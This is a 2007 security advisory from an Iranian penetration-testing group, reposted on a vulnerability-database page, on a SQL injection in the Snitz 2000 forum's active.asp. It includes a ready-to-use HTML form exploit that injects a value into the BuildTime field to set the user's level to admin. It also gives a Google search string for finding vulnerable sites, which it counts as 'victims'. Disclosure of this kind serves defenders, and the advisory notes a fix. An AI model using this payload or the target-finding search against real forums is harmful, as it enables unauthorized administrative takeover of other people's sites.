Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18561
HistoryDec 05, 2007 - 12:00 a.m.

Snitz2000 SQL Injection: A user can gain admin level

2007-12-0500:00:00
vulners.com
42
JSON

########################## WwW.BugReport.ir #########################

AmnPardaz Security Research & Penetration Testing Group

Title: A user can gain admin level in snitz 2000 by SQL Injection

vendor: http://forum.snitz.com/

Googling: "Powered by Snitz" > 2,440,000 victims

Last bug report in 2007-02-16 with 4692 visitors

Exploit: Available

Fix Available: Update to last version.

######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in "Active.asp"

After login to your VICTIM forum, execute below script

<form action="http://[VICTIM URL]/active.asp" method="post">
Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br />
DefaultValues: <input type="text" name="AllRead" value="Y" /><br />
Submit: <input type="submit" name="submit" value="Submit" /><br />
</form>
~~~~~~~~~~~~End HTML Exploit~~~~~~~~~

#####################################################################
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact: [email protected]
# Credit: Soroush Dalili found this bug.
#####################################################################
JSON